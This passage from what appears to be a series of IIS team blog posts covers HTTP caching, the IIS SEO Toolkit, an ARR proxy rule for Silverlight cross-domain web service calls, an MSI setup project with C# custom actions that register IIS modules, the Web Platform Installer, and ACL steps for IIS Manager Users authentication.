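    """Return 304 if the client's cached copy is still valid, otherwise 200."""
    client_etag = request_headers.get("If-None-Match")
    if client_etag is not None:
        return 304 if client_etag == etag else 200
    since = request_headers.get("If-Modified-Since")
    if since is not None:
        if parsedate_to_datetime(last_modified) <= parsedate_to_datetime(since):
            return 304
    return 200


if __name__ == "__main__":
    request = {
        "If-Modified-Since": "Mon, 09 Jun 2008 16:58:00 GMT",
        "If-None-Match": '"01c13f951cac81:0"',
    }
    print(status_for(request, '"01c13f951cac81:0"', "Mon, 09 Jun 2008 16:58:00 GMT"))
```

Either way the browser has already paid for the roundtrip, which is why sending Cache-Control up front is the better fix.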

Summary

To summarize, with the IIS Search Engine Optimization Toolkit you can easily build your own queries to learn more about your own Web site and find details that would otherwise be tedious to track down. In this case I showed how easy it is to find all the images that are not specifying any caching headers, and you can do the same thing for scripts (if you add Content Type Normalized Equals application/javascript) or styles (Content Type Normalized Equals text/css). This way you can increase rendering performance and reduce the overall bandwidth of your Web site.

Today we are releasing the IIS Search Engine Optimization Toolkit. The IIS SEO Toolkit is a set of features that aim to help you keep your Web site and its content in good shape for both Users and Search Engines.

This Beta release includes the following features:

  • Site Analysis. This feature includes a crawler that starts looking at your Web site contents, discovering links, downloading the contents and applying a set of validation rules aimed at helping you easily troubleshoot common problems such as broken links and duplicate content. It also provides keyword analysis, route analysis and many more features that will help you improve the overall quality of your Web site.
  • Robots Exclusion Editor. This includes a powerful editor to author Robots Exclusion files. It can leverage the output of a Site Analysis crawl report and allows you to easily add the Allow and Disallow entries without having to edit a plain text file, making the process less error prone and more reliable. Furthermore, you can run the Site Analysis feature again and immediately see the results of applying your robots files.
  • Sitemap and Sitemap Index Editor. Similar to the Robots editor, this allows you to author Sitemap and Sitemap Index files with the ability to discover both the physical and the logical (Site Analysis crawler report) views of your Site.
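For readers who have not seen one, a Sitemap file of the kind the editor authors is a small XML document that follows the sitemaps.org protocol. The sketch below is hand-written for illustration; the example.com URLs, dates and values are made up and are not output from the toolkit.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <url>
    <!-- loc is the only required child; the rest are optional hints for crawlers -->
    <loc>http://www.example.com/</loc>
    <lastmod>2009-06-01</lastmod>
    <changefreq>weekly</changefreq>
    <priority>0.8</priority>
  </url>
  <url>
    <loc>http://www.example.com/products/</loc>
  </url>
</urlset>
```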

Check out the great blog post about the IIS SEO Toolkit by ScottGu, or this simple IIS SEO video showing some of its capabilities.

Run it in your Development, Staging, or Production Environments

One of the problems with many similar tools out there is that they require you to publish the updates to your production sites before you can even use the tools, and of course would never be usable for Intranet or internal applications that are not exposed to the Web. The IIS Search Engine Optimization Toolkit can be used internally in your own development or staging environments giving you the ability to clean up the content before publishing to the Web. This way your users do not need to pay the price of broken links once you publish to the Web and you will not need to wait for those tools or Search Engines to crawl your site to finally discover you broke things.

For developers this means that they can now easily look at the potential impact of removing or renaming a file, and easily check which files refer to a given page and which files can be removed because they are referenced only by that page.

Run it against any Web application built on any framework running in any server

One thing that is important to clarify is that you can target and analyze your production sites if you want to, and you can target Web applications running on any platform, whether it's ASP.NET, PHP, or plain HTML files running in your local IIS or on any other remote server.

Bottom line: try it against your Web site, look at the different features and give us feedback on additional reports, options, violations, content to parse, etc. Post any comments or questions at the IIS Search Engine Optimization Forum.

The IIS SEO Toolkit documentation can be found at http://learn.iis.net/page.aspx/639/using-iis-search-engine-optimization-toolkit/, but remember this is only Beta 1 so we will be adding more features and content.

IIS Search Engine Optimization Toolkit

While using IIS Manager, have you ever wondered which configuration section the UI is changing, or whether there is a way to automate the same change using scripts or the command line?

Well, if you use IIS Manager 7.0 you might have noticed that every page has a link called Online Help, and if you've ever clicked it you will have noticed that it takes you to the IIS 7 Operations Guide. You might ask yourself whether it was really that important to place that link on every page; the answer is that we had other reasons to add it there.

Back when we were designing the UI we realized we wanted to provide the best content we could for each page, and potentially be able to update it as more content became available, so we added this link. However, the content was not ready at the time, so we pointed it to our operations guide instead.

But the good news is that we are updating those links to point to their respective entries in the Configuration Reference that was recently published. This means that now, on any page in IIS Manager, clicking Online Help takes you to the configuration section that the UI changes, with details about what the section looks like and ways to change it using scripts, AppCmd, etc.

Online Help

Interestingly, this new routing mechanism is brought to you by our very own URL Rewrite module, using a simple Rewrite Map and a couple of rules. If you haven't looked into it, you should definitely download it and give it a try. You'll soon realize that there are so many things you can do without writing any code that you'll love it.
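To give an idea of what a Rewrite Map combined with a rule looks like, here is a minimal sketch. The map name HelpTopics, the keys and the target URLs are all made up for illustration; they are not the actual entries used for the Online Help links.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <rewrite>
      <rewriteMaps>
        <!-- Hypothetical map: each key is a requested path, each value is where it should go -->
        <rewriteMap name="HelpTopics">
          <add key="/help/modules" value="http://www.example.com/reference/modules" />
          <add key="/help/handlers" value="http://www.example.com/reference/handlers" />
        </rewriteMap>
      </rewriteMaps>
      <rules>
        <rule name="Redirect help topics" stopProcessing="true">
          <match url=".*" />
          <conditions>
            <!-- Look up the requested path in the map; the condition matches only if a value was found -->
            <add input="{HelpTopics:{REQUEST_URI}}" pattern="(.+)" />
          </conditions>
          <action type="Redirect" url="{C:1}" appendQueryString="false" redirectType="Found" />
        </rule>
      </rules>
    </rewrite>
  </system.webServer>
</configuration>
```

The nice part of this design is that adding a new link only means adding one more entry to the map; the rule itself never changes.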


During this PDC I attended Ian's presentation about WPF and Silverlight, where he demonstrated the high degree of compatibility that can be achieved between a WPF desktop application and a Silverlight application. One of the differences he demonstrated shows up when your application consumes Web Services. Since Silverlight applications execute in a sandboxed environment, they are not allowed to call arbitrary Web Services or issue HTTP requests to any server other than the originating server, unless that server exposes a cross-domain manifest stating that it may be called by clients from that domain.
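For reference, a cross-domain manifest of this kind is a small XML file that the target server exposes at its root. A minimal sketch of Silverlight's clientaccesspolicy.xml, assuming the service owner wanted to allow SOAP calls from clients hosted at http://localhost (a domain picked only for illustration), might look like this:

```xml
<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <!-- Assumption: http://localhost is an illustrative caller domain -->
      <allow-from http-request-headers="SOAPAction">
        <domain uri="http://localhost" />
      </allow-from>
      <grant-to>
        <!-- Grants access to every path on the server that hosts this file -->
        <resource path="/" include-subpaths="true" />
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>
```

The catch is that this file has to live on the server that hosts the Web Service, so it only helps when you control that server or its owner is willing to add it.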

Then he moved to show how you can work around this architectural difference by writing your own Web Service or HTTP end-point that basically gets the request from the client and, using code on the server, just calls the real Web Service. This way the client sees only the originating server, which allows the call to succeed, and the server can freely call the real Web Service. Funnily enough, while searching for a Quote Service I ran into an article by Dino Esposito in MSDN Magazine where he explains the same issue and also exposes a "Compatibility Layer", which again is just code (more than 40 lines of it) that acts as a proxy to call a Web Service (except he uses the JSON serializer to return the values).

The obvious disadvantage is that you have to write code that only forwards the request and returns the response, acting essentially as a proxy. Of course this can be very simple, but if the Web Service you are trying to call has any degree of complexity where custom types are being sent around, or if you actually need to consume several methods exposed by it, then it quickly becomes a big maintenance nightmare: you have to keep the wrappers in sync when the service changes, handle errors properly, and deal with differences when reporting network issues, SOAP exceptions, HTTP exceptions, etc.

So after looking at this, I immediately thought about ARR (Application Request Routing), a new extension for IIS 7.0 (see http://www.iis.net/extensions) that you can download for free from IIS.NET for Windows Server 2008 and that, among many other things, is capable of doing this kind of routing without writing a single line of code.

This post tries to show how easy it is to implement this using ARR. Here are the steps to try it (the required software is listed at the end). Note that if you are only interested in what is really new, just go to the 'Enter Application Request Routing and IIS 7.0' section below to see the configuration that fixes the Web Service call.

  1. Create a new Silverlight Project (linked to an IIS Web Site)
    1. Launch Visual Web Developer from the Start Menu
    2. File->Open Web Site->Local IIS->Default Web Site. Click Open
    3. File->Add->New Project->Visual C#->Silverlight->Silverlight Application
    4. Name: SampleClient, Location: c:\Demo. Click OK
    5. On the "Add Silverlight Application" dialog choose the "Link this Silverlight control into an existing Web site" option, and choose the Web site in the combo box.
    6. This will add a SampleClientTestPage.html to your Web site which we will run to test the application.
  2. Find a Web Service to consume
    1. In my case I searched using http://live.com for a Stock Quote Service and found one at http://www.webservicex.net/stockquote.asmx
  3. Back at our Silverlight project, add a Service Reference to the WSDL
    1. Select the SampleClient project in the Solution Explorer window
    2. Project->Add Service Reference and type http://www.webservicex.net/stockquote.asmx in the Address and click Go
    3. Specify a friendly Namespace, in this case StockQuoteService
    4. Click OK
  4. Add a simple UI to call the Service
    1. In the Page.xaml editor type the following code inside the <UserControl></UserControl> tags:

        <Grid x:Name="LayoutRoot" Background="Azure">
            <Grid.RowDefinitions>
                <RowDefinition Height="30" />
                <RowDefinition Height="*" />
            </Grid.RowDefinitions>
            <Grid.ColumnDefinitions>
                <ColumnDefinition Width="50" />
                <ColumnDefinition Width="*" />
                <ColumnDefinition Width="50" />
            </Grid.ColumnDefinitions>
            <TextBlock Grid.Column="0" Grid.Row="0" Text="Symbol:" />
            <TextBox Grid.Column="1" Grid.Row="0" x:Name="_symbolTextBox" />
            <Button Grid.Column="2" Grid.Row="0" Content="Go!" Click="Button_Click" />
            <ListBox Grid.Column="0" Grid.Row="1" x:Name="_resultsListBox" Grid.ColumnSpan="3"
                     ItemsSource="{Binding}">
                <ListBox.ItemTemplate>
                    <DataTemplate>
                        <StackPanel Orientation="Horizontal">
                            <TextBlock Text="{Binding Path=Name}" FontWeight="Bold" Foreground="DarkBlue" />
                            <TextBlock Text=" = " />
                            <TextBlock Text="{Binding Path=Value}" />
                        </StackPanel>
                    </DataTemplate>
                </ListBox.ItemTemplate>
            </ListBox>
        </Grid>

    2. Right click the Button_Click text above and select the "Navigate to Event Handler" context menu.
    3. Enter the following code to call the Web Service:

        private void Button_Click(object sender, RoutedEventArgs e)
        {
            var service = new StockQuoteService.StockQuoteSoapClient();
            service.GetQuoteCompleted += service_GetQuoteCompleted;
            service.GetQuoteAsync(_symbolTextBox.Text);
        }

    4. Now, since we are going to use XLINQ to parse the result of the Web Service, which is XML, we need to add a reference to System.Xml.Linq by using Project->Add Reference->System.Xml.Linq.
    5. Finally, add the following function to handle the result of the Web Service:

        void service_GetQuoteCompleted(object sender, StockQuoteService.GetQuoteCompletedEventArgs e)
        {
            var el = System.Xml.Linq.XElement.Parse(e.Result);
            _resultsListBox.DataContext = el.Element("Stock").Elements();
        }

  5. Compile the application. Build->Build Solution.
  6. At this point we are ready to test our application. To run it, just navigate to http://localhost/SampleClientTestPage.html or simply select SampleClientTestPage.html in the Solution Explorer and click View In Browser.
  7. Enter a Stock Symbol (say MSFT) and press Go!, then verify that it breaks. You will see a small "Error in page" with a Warning icon in the status bar. If you click that and select show details you will get a dialog with the following message:
     Message: Unhandled Error in Silverlight 2 Application An exception occurred during the operation, making the result invalid.

Enter Application Request Routing and IIS 7.0

  1. Ok, so now we are running into the cross-domain issue, and unfortunately we don't have a cross-domain manifest; here is where ARR can help us call the service without writing more code.
  2. Modify the Web Service configuration to call a local Web Service instead
    1. Back in Visual Web Developer, open the file ServiceReferences.ClientConfig
    2. Modify the address="http://www.webservicex.net/stockquote.asmx" to be instead address="http://localhost/stockquote.asmx"; it should look like:

        <client>
            <endpoint address="http://localhost/stockquote.asmx"
                      binding="basicHttpBinding" bindingConfiguration="StockQuoteSoap"
                      contract="StockQuoteService.StockQuoteSoap" name="StockQuoteSoap" />
        </client>

  3. This will cause the client to call the Web Service on the same originating server. Now we can configure an ARR/URL Rewrite rule to route the Web Service requests to the original end-point
    1. Add a new Web.config to the http://localhost project (Add new item->Web.config)
    2. Add the following content:

        <?xml version="1.0" encoding="UTF-8"?>
        <configuration>
            <system.webServer>
                <rewrite>
                    <rules>
                        <rule name="Stock Quote Forward" stopProcessing="true">
                            <match url="^stockquote\.asmx$" />
                            <action type="Rewrite" url="http://www.webservicex.net/stockquote.asmx" />
                        </rule>
                    </rules>
                </rewrite>
            </system.webServer>
        </configuration>

  4. This rule basically uses a regular expression to match the requests for StockQuote.asmx and forwards them to the real Web Service.
  5. Compile everything by running Build->Rebuild Solution
  6. Back in your browser refresh the page to get the new version, enter MSFT in the symbol and press Go!
  7. And Voila!!! everything works.
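
One assumption worth calling out: rewriting a request to a different server relies on ARR's proxy functionality being enabled at the server level, which the steps above do not show. If the rule does not seem to take effect, a likely thing to check is the proxy section (the "Enable proxy" checkbox in the ARR Server Proxy Settings of IIS Manager). A minimal sketch of the relevant fragment:

```xml
<!-- applicationHost.config (server level), not the site's Web.config -->
<system.webServer>
  <!-- Allows URL Rewrite rules to forward requests to other servers through ARR -->
  <proxy enabled="true" />
</system.webServer>
```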

Summary

One of the features offered by ARR is proxy functionality to forward requests to another server. One of the scenarios where this is useful is with clients that cannot make calls directly to the real data; this includes Silverlight, Flash and AJAX applications. As shown in this post, with just a few lines of XML configuration you can enable clients to call services in other domains without having to write hundreds of lines of code for each method. It also means that I get the original data and that if the WSDL were to change I would not need to update any wrappers. Additionally, if you use REST-based services you could use local caching on your server, relying on Output Cache, and increase the performance of your applications significantly (again with no code changes).

Software used

Here is the software I installed to do this sample (amazing that all of it is completely free):

  1. Install Visual Web Developer 2008 Express
  2. Install Silverlight Tools for Visual Studio 2008 SP 1
  3. Install Application Request Routing for IIS 7.

Introduction

IIS 7 provides a rich extensibility model. Whether you are extending the server or the user interface, one critical thing is to provide a simple setup application that can install all the required files, add any required registration information, and modify the server settings as required by the extension.
Visual Studio 2008 provides a set of project types called Setup and Deployment projects specifically for this kind of application. The output generated by these projects is an MSI that can perform several actions for you, including copying files, adding files to the GAC, adding registry keys, and many more.
In this document we will create a setup project to install a hypothetical runtime Server Module that also includes a User Interface extension for IIS Manager.
Our setup will basically perform the following actions:
•    Copy the required files, including three DLLs and an html page.
•    Add a couple of registry keys.
•    Add the managed assemblies to the GAC
•    Modify applicationHost.config to register a new module
•    Modify administration.config to register a new UI extensibility for InetMgr
•    Create a new sample application that exposes the html pages
•    Finally, we will remove the changes from both configuration files during uninstall

Creating the Setup Project

Start Visual Studio 2008. In the File Menu, select the option New Project.
In the New Project Dialog, expand the Other Project Types option in the Project type tree view.
Select the option Setup and Deployment type and select the option Setup Project. Enter a name for the Project and a location. I will use SampleSetup as the name.

image

Adding Files to the Setup

  • Select the menu View->Editor->File System. This will open the editor where you can add all the files that you need to deploy with your application. In this case I will just add an html file that I have created called readme.htm.
  • To do that, right click the Application Folder directory in the tree view and select the option Add File. Browse to your files and select all the files you want to copy to the setup folder (by default <Program Files>\<Project Name>).

Adding assemblies to the GAC

Adding assemblies to the setup is done in the same File System editor, however it includes a special folder called Global Assembly Cache that represents the GAC in the target system.
In our sample we will add to the GAC the assemblies that have the runtime server module and the user interface modules for IIS Manager. I have created the following set of projects:

  1. SampleModule.dll that contains the runtime module.
  2. SampleModuleUI.dll that contains the server-side portion of the IIS Manager extension (ModuleProvider, ModuleService, etc).
  3. SampleModuleUIClient.dll that contains the client side portion of the IIS Manager extension (Module, ModulePage, TaskLists, etc).


Back in Visual Studio,

  • Select the menu option View->Editor->File System
  • Right-click the root node in the Tree view titled File System on Target Machine and select the option Add Special Folder.
    Select the option Global Assembly Cache Folder.
    Right click the newly added GAC folder, choose the option Add File, browse to the DLL and choose OK. Another option is to choose Add Assembly and use the "Select Component" dialog to add it.
    Visual Studio will recognize the dependencies that the assembly has, and will try to add them to the project automatically. However, certain assemblies such as Microsoft.Web.Administration, or any other System assemblies should be excluded because they will already be installed in the target machine.
  • To ensure that you don't ship system assemblies, in the Solution Explorer expand the Detected Dependencies folder and right click each of the assemblies that shouldn't be packaged and select the option Exclude. (In our case we will exclude Microsoft.Web.Administration.dll, Microsoft.Web.Management.dll, Microsoft.ManagementConsole.dll and MMCFxCommon.dll)
    After completing this, the project should look as follows:

image

Adding Registry Keys

Visual Studio also includes a Registry editor that helps you add registry keys on the target machine. For this sample I will just add a string value named Message under HKEY_LOCAL_MACHINE\Software\My Company. To do that:
Select the menu option View->Editor->Registry.
Expand the HKEY_LOCAL_MACHINE node and drill down to Software\[Manufacturer].
[Manufacturer] is a variable that holds the name of the company, and can be set by selecting the SampleSetup node in Solution Explorer and using the Property Grid to change it. There are several other variables defined, such as Author, Description, ProductName, Title and Version, that help whenever dynamic text is required.
Right click [Manufacturer] and select the option new String Value. Enter Message as the name. To set the value you can select the item in the List View and use the Property Grid to set its value.
After completing this, the project should look as follows:

image

Executing Custom Code

To support running custom code as part of the setup application, Visual Studio (more precisely, MSI) supports the concept of Custom Actions. These Custom Actions include running an application, running a script or executing code from a managed assembly.
For our sample, we will create a new project where we will add all the code to read and change configuration.
Select the option File->Add->New Project.
Select the Class Library template and name it SetupHelper.

image

  • Since we will be creating a custom action, we need to add a reference to System.Configuration.Install to be able to create the custom action. Use the Project->Add Reference. And in the .NET Tab select the System.Configuration.Install and press OK.
  • Since we will also be modifying server configuration (for registering the HTTP Module in ApplicationHost.config and the ModuleProvider in administration.config) using Microsoft.Web.Administration we need to add a reference to it as well. Again use the Project->Add Reference, and browse to <windows>\system32\inetsrv and select Microsoft.Web.Administration.dll
  • Rename the file Class1.cs to SetupAction.cs and rename the class to SetupAction. This class needs to inherit from System.Configuration.Install.Installer, which is the base class for all custom actions and has several methods that you can override to add custom logic to the setup process. In this case we will add our code in the Install and the Uninstall methods.
using System;
using System.ComponentModel;
using System.Configuration.Install;

namespace SetupHelper {

    [RunInstaller(true)]
    public class SetupAction : Installer {

        public override void Install(System.Collections.IDictionary stateSaver) {
            base.Install(stateSaver);

            InstallUtil.AddUIModuleProvider(
                "SampleUIModule",
                "SampleUIModule.SampleModuleProvider, SampleUIModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
            );

            // Add a Server Module to applicationHost.config
            InstallUtil.AddModule(
                "SampleModule",
                "SampleModule.SampleModule, SampleModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1"
            );

            // Create a web application
            InstallUtil.CreateApplication(
                "Default Web Site",
                "/SampleApp",
                Context.Parameters["TargetDir"]
            );
        }

        public override void Uninstall(System.Collections.IDictionary savedState) {
            base.Uninstall(savedState);

            InstallUtil.RemoveUIModuleProvider("SampleUIModule");
            InstallUtil.RemoveModule("SampleModule");
            InstallUtil.RemoveApplication("Default Web Site", "/SampleApp");
        }
    }
}

As you can see, the code above is actually really simple: it just calls helper methods in a utility class called InstallUtil that is shown at the end of this entry. You will also need to add the InstallUtil class to the project to be able to compile it. The only interesting piece of code above is how we pass the TargetDir from the Setup project to the Custom Action through the Parameters property of the InstallContext type.
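
To make the goal of those helper calls more concrete, the entries they are expected to add should look roughly like the fragments below. This is a hand-written sketch rather than output captured from a real install: the surrounding elements are simplified, other attributes and existing entries are omitted, and [TARGETDIR] stands for whatever folder the user picks during setup.

```xml
<!-- applicationHost.config: the runtime module registered by AddModule -->
<system.webServer>
  <modules>
    <add name="SampleModule" type="SampleModule.SampleModule, SampleModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1" />
  </modules>
</system.webServer>

<!-- applicationHost.config: the application created by CreateApplication -->
<site name="Default Web Site">
  <application path="/SampleApp">
    <virtualDirectory path="/" physicalPath="[TARGETDIR]" />
  </application>
</site>

<!-- administration.config: the IIS Manager extension registered by AddUIModuleProvider -->
<moduleProviders>
  <add name="SampleUIModule" type="SampleUIModule.SampleModuleProvider, SampleUIModule, Version=1.0.0.0, Culture=neutral, PublicKeyToken=12606126ca8290d1" />
</moduleProviders>
<!-- In a default administration.config this section typically sits inside a <location path="."> element -->
<modules>
  <add name="SampleUIModule" />
</modules>
```

Looking for these entries after running the MSI (and checking that they are gone after uninstalling) is a quick way to verify that the custom action did its job.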

Configuring the Custom Action

To be able to use our new Custom Action we need to add the SetupHelper output to our setup project, for that:
Select the option View->Editor->File System
Right-click the Application Folder node and select the option Add Project Output... and select the SetupHelper project in the Project drop down.

image

After doing this, the DLL will be included as part of our setup.

Adding the Install Custom Action

Select the option View->Editor->Custom Actions
Right-click the Install node and select the option Add Custom Action…, then drill down into the Application Folder and select the Primary output from SetupHelper.

image

Click OK and type a name such as InstallModules

Now, since we want to pass the TargetDir variable to be used as the physical path for the web application that we will create within our Installer derived-class, select the custom action and go to the Property Grid. There is a property called CustomActionData. This property is used to pass any data to the installer parameters class, and uses the format “/<name>=<value>”. So for our example we will set it to: /TargetDir="[TARGETDIR]\"

image

Adding the Uninstall Custom Action

In the same editor, right-click the Uninstall node and select the option Add Custom Action…, again drill down into the Application Folder and select the Primary output from SetupHelper.
Press OK and type a name such as UninstallModules.
After doing this the editor should look as follows:

image

Building and Testing the Setup

Finally we can build the solution by using the Build->Rebuild Solution menu option.
This will create a file called SampleSetup.msi in the folder SampleSetup\SampleSetup\Debug.
You can now run this MSI and it will walk through the process of installing. The user interface that is provided by default can also be configured to add new steps or remove the current steps. You can also provide a Banner logo for the windows and many more options from the View->Editor->User Interface.


Visual Studio provides different packaging mechanisms for the setup application. You can change it through the Project Properties dialog where you get the option to use:
1)    As loose uncompressed files. This option packages all the files by just copying them into a file system structure where the files are copied unchanged. This is a good packaging option for CD or DVD based setups
2)    In setup file. This option packages all the files within the MSI file
3)    In cabinet files. This option creates a set of CAB files that can be used in scenarios such as diskette based setup.

You can also customize all the setup properties using the property grid, such as DetectNewerInstalledVersion, which will warn users if a newer version is already installed, or RemovePreviousVersion, which will automatically remove older versions whenever the user tries to install a new one.

 

64-bit considerations

It turns out that the managed code custom action will fail on 64-bit platforms because it is executed as a 32-bit custom action. The following blog post discusses the details and shows how you can fix the issue:

http://blogs.msdn.com/heaths/archive/2006/02/01/64-bit-managed-custom-actions-with-visual-studio.aspx

 

 

Summary

Visual Studio 2008 provides a simple way to create Setup applications that can run custom code through Custom Actions. In this document we created a simple custom action to install modules and InetMgr extensions using this support.

For the latest information about IIS 7.0, see the IIS 7 Web site at http://www.iis.net

InstallUtil

This is the class that is used from the SetupAction class we created in the SetupHelper project to do the actual changes in configuration. As you can see it only has six public methods: AddModule, AddUIModuleProvider, CreateApplication, RemoveApplication, RemoveModule, and RemoveUIModuleProvider. The remaining method, FindByAttribute, is just a helper to facilitate reading configuration.

using System;
using Microsoft.Web.Administration;

namespace SetupHelper {

    public static class InstallUtil {

        /// <summary>
        /// Registers a new Module in the Modules section inside ApplicationHost.config
        /// </summary>
        public static void AddModule(string name, string type) {
            using (ServerManager mgr = new ServerManager()) {
                Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
                ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
                ConfigurationElementCollection modules = modulesSection.GetCollection();

                if (FindByAttribute(modules, "name", name) == null) {
                    ConfigurationElement module = modules.CreateElement();
                    module.SetAttributeValue("name", name);
                    if (!String.IsNullOrEmpty(type)) {
                        module.SetAttributeValue("type", type);
                    }

                    modules.Add(module);
                }

                mgr.CommitChanges();
            }
        }

        public static void AddUIModuleProvider(string name, string type) {
            using (ServerManager mgr = new ServerManager()) {

                // First register the Module Provider
                Configuration adminConfig = mgr.GetAdministrationConfiguration();

                ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
                ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
                if (FindByAttribute(moduleProviders, "name", name) == null) {
                    ConfigurationElement moduleProvider = moduleProviders.CreateElement();
                    moduleProvider.SetAttributeValue("name", name);
                    moduleProvider.SetAttributeValue("type", type);
                    moduleProviders.Add(moduleProvider);
                }

                // Now register it so that all Sites have access to this module
                ConfigurationSection modulesSection = adminConfig.GetSection("modules");
                ConfigurationElementCollection modules = modulesSection.GetCollection();
                if (FindByAttribute(modules, "name", name) == null) {
                    ConfigurationElement module = modules.CreateElement();
                    module.SetAttributeValue("name", name);
                    modules.Add(module);
                }

                mgr.CommitChanges();
            }
        }

        /// <summary>
        /// Create a new Web Application
        /// </summary>
        public static void CreateApplication(string siteName, string virtualPath, string physicalPath) {
            using (ServerManager mgr = new ServerManager()) {
                Site site = mgr.Sites[siteName];
                if (site != null) {
                    site.Applications.Add(virtualPath, physicalPath);
                }
                mgr.CommitChanges();
            }
        }

        /// <summary>
        /// Helper method to find an element based on an attribute
        /// </summary>
        private static ConfigurationElement FindByAttribute(ConfigurationElementCollection collection, string attributeName, string value) {
            foreach (ConfigurationElement element in collection) {
                if (String.Equals((string)element.GetAttribute(attributeName).Value, value, StringComparison.OrdinalIgnoreCase)) {
                    return element;
                }
            }

            return null;
        }

        public static void RemoveApplication(string siteName, string virtualPath) {
            using (ServerManager mgr = new ServerManager()) {
                Site site = mgr.Sites[siteName];
                if (site != null) {
                    Application app = site.Applications[virtualPath];
                    if (app != null) {
                        site.Applications.Remove(app);
                        mgr.CommitChanges();
                    }
                }
            }
        }

        /// <summary>
        /// Removes the specified module from the Modules section by name
        /// </summary>
        public static void RemoveModule(string name) {
            using (ServerManager mgr = new ServerManager()) {
                Configuration appHostConfig = mgr.GetApplicationHostConfiguration();
                ConfigurationSection modulesSection = appHostConfig.GetSection("system.webServer/modules");
                ConfigurationElementCollection modules = modulesSection.GetCollection();
                ConfigurationElement module = FindByAttribute(modules, "name", name);
                if (module != null) {
                    modules.Remove(module);
                }

                mgr.CommitChanges();
            }
        }

        /// <summary>
        /// Removes the specified UI Module by name
        /// </summary>
        public static void RemoveUIModuleProvider(string name) {
            using (ServerManager mgr = new ServerManager()) {
                // First remove it from the sites
                Configuration adminConfig = mgr.GetAdministrationConfiguration();
                ConfigurationSection modulesSection = adminConfig.GetSection("modules");
                ConfigurationElementCollection modules = modulesSection.GetCollection();
                ConfigurationElement module = FindByAttribute(modules, "name", name);
                if (module != null) {
                    modules.Remove(module);
                }

                // now remove the ModuleProvider
                ConfigurationSection moduleProvidersSection = adminConfig.GetSection("moduleProviders");
                ConfigurationElementCollection moduleProviders = moduleProvidersSection.GetCollection();
                ConfigurationElement moduleProvider = FindByAttribute(moduleProviders, "name", name);
                if (moduleProvider != null) {
                    moduleProviders.Remove(moduleProvider);
                }

                mgr.CommitChanges();
            }
        }
    }
}

Today we are releasing a new Web Site at http://www.microsoft.com/web/ that gives users a one-stop shop for learning about the Microsoft Web Platform. It is part of a bigger effort to make it easier to get started building and running Web Applications on Windows and IIS.

As part of this, a new tool called the Web Platform Installer Beta is also being released. It helps you get started by installing all the software you need from a single place, without having to hunt around for installers or links. Just launch the tool, choose the software and configuration you are interested in, and it takes care of validating and installing prerequisites.

This tool lets you easily set up your development machines for building Web Applications. It will also help you discover new tools, applications, features and betas as they are released from several sources, including IIS, ASP.NET and Visual Web Developer, with more to come as we make new software available through updates to the feed that the tool consumes.

Download page: http://www.microsoft.com/web/channel/products/WebPlatformInstaller.aspx

Link to Run it: http://go.microsoft.com/?linkid=9588072 

Here are a few snapshots of the tool:

This is the start page where you can choose to install everything available or customize the installation (Your Choice).

[Screenshot: WebPI Start Page]

On this page you can customize the selection, browse the current list of products, and check or uncheck any product you want to install.

[Screenshot: product selection page]

There are a couple more pages, and finally the progress page, where the tool downloads any required files and installs them, so that you can get the whole Web Platform installed in one go.

[Screenshot: installation progress page]

Some of the products and features that the Beta supports installing and configuring include:

  1. IIS (Ability to granularly configure each of the features of IIS)
  2. IIS Extensions (such as the Out-of-band releases that we have made available in http://www.iis.net including Bit Rate Throttling, Web Playlist, Microsoft Web Deployment, FTP 7.0 Server, URL Rewrite, and more)
  3. .NET Framework 3.5
  4. SQL Express 2008
  5. SQL Server Driver for PHP
  6. Visual Web Developer 2008 Express
  7. Windows Installer 4.5
  8. more

As you can see, that is everything you need to build Web Applications, from a Web Server (IIS) to a development tool (Visual Web Developer) to a database (SQL Server Express) and more, all for free.

So go ahead and try the tool and give us feedback (remember this is a Beta) so it can only get better :)


Today in the IIS.NET Forums someone asked whether it is possible to use IIS Manager Users authentication in the context of a Web Application, so that you could have, say, WebDAV using the same credentials you use for IIS Manager Remote Administration.

IIS Manager Remote Administration allows you to connect and manage your Web Site using credentials that are not Windows users, but just a combination of user name and password. This is implemented following a provider model, where the default implementation we ship uses our Administration.config file (%windir%\system32\inetsrv\config\administration.config) as the storage for these users. However, you can easily extend the provider base class to authenticate against a database or any other user store if needed. This also means you can build your own application and call our APIs (ManagementAuthentication).

Even better, in the context of a Web Site running in IIS 7.0 you can actually implement this without having to write a single line of code.

Disclaimer: Out of the box, only administrators have permission to read Administration.config. This means that a Web Application will not be able to access the file, so you need to change the ACLs on the file to grant read permission to your application. Make sure you limit the read access to the minimum required, as in the steps below.

Here is how you do it:

  1. First make sure that your Web Site is using SSL. (In IIS Manager, right-click your Web Site, choose Edit Bindings and add an SSL binding.)
  2. So that we can restrict permissions further, make your application run in its own Application Pool; this way the required ACL changes affect only your application pool and nothing else. Using IIS Manager, go to Application Pools and add a new Application Pool running in Integrated mode, and give it a name you can easily remember, say WebMgmtAppPool (we will use this in the permissions below).
  3. Disable Anonymous Authentication in your application. (In IIS Manager, drill down to your application, double-click the Authentication feature, and disable Anonymous Authentication and any other authentication module that is enabled.)
  4. Enable the Web Management Authentication Module in your application by adding a Web.config file with the following contents:
    <configuration>
      <system.webServer>
        <modules>
          <add name='WebManagementBasicAuthentication'
               type='Microsoft.Web.Management.Server.WebManagementBasicAuthenticationModule, Microsoft.Web.Management, Version=7.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35' />
        </modules>
      </system.webServer>
    </configuration>
  5. Modify the ACL's in the required configuration files:
    1. Give read access to the config directory so we can access the files using the following command line (note that we are only giving permissions to the Application Pool)
      icacls %windir%\system32\inetsrv\config /grant "IIS AppPool\WebMgmtAppPool":(R)
    2. Give read access to the redirection.config:
      icacls %windir%\system32\inetsrv\config\redirection.config /grant "IIS AppPool\WebMgmtAppPool":(R)
    3. Finally give read access to administration.config:
